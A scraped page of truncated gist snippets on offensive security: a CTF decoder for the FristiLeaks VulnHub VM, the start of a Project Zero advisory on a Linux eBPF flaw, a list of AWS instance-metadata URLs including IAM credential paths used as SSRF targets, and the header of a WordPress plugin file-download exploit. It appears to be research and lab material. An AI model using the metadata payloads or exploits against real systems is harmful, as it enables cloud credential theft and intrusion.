This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Wrote this simple function to solve the CTF designed for FristiLeaks v1.3 VulnHub VM | |
#!/usr/bin/python | |
import base64,codecs,sys | |
def decodeString(str): | |
decode = codecs.decode(str[::-1], 'rot13') | |
return base64.b64decode(decode) | |
cryptoResult=decodeString(sys.argv[1]) | |
print cryptoResult |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 | |
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the | |
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, | |
unprivileged code can use the bpf() syscall to load eBPF socket filter programs. | |
These conditions are fulfilled in Ubuntu 16.04. | |
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first | |
function that touches the supplied eBPF instructions is | |
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation | |
# Google Dork: N/A | |
# Date: 04/01/2016 | |
# Exploit Author: evait security GmbH | |
# Vendor Homepage: arshmultani - http://dscom.it/ | |
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/ | |
# Version: 1.0 | |
# Tested on: Linux Apache / Wordpress 4.2.2 |